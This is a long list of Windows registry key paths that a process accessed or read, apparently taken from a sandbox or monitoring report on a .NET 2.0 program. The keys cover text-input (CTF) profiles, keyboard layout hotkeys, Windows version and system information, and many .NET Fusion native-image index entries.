HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{03B5835F-F03C-411B-9CE2-AA23E1171E36}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{07EB03D6-B001-41DF-9192-BF9B841EE71F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{3697C5FA-60DD-4B56-92D4-74A569205C16}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{531FDEBF-9B4C-4A43-A2AA-960E8FCDC732}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{70FAF614-E0B1-11D3-8F5C-00C04F9CF4AC}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{78CB5B0E-26ED-4FCC-854C-77E8F3D1AA80}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{81D4E9C9-1D3B-41BC-9E6C-4B40BF79E35E}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{A028AE76-01B1-46C2-99C4-ACD9858AE02F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{AE6BE008-07FB-400D-8BEB-337A64F7051F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{F89E9E58-BD2F-4008-9AC2-0F816C09F4EE}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_CURRENT_USER\Keyboard Layout\Toggle
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Language Hotkey
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Hotkey
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Layout Hotkey
HKEY_CURRENT_USER\Software\Microsoft\CTF\DirectSwitchHotkeys
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\TurnOffSPIAnimations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Segoe UI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\EditionID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuildLabEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\BIOSVersion
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Windows\CSDBuildNumber
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\CEIPRole\RolesInWER
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\LastWatsonCabUploaded
HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\WinHttpSettings
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\44D72C57
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
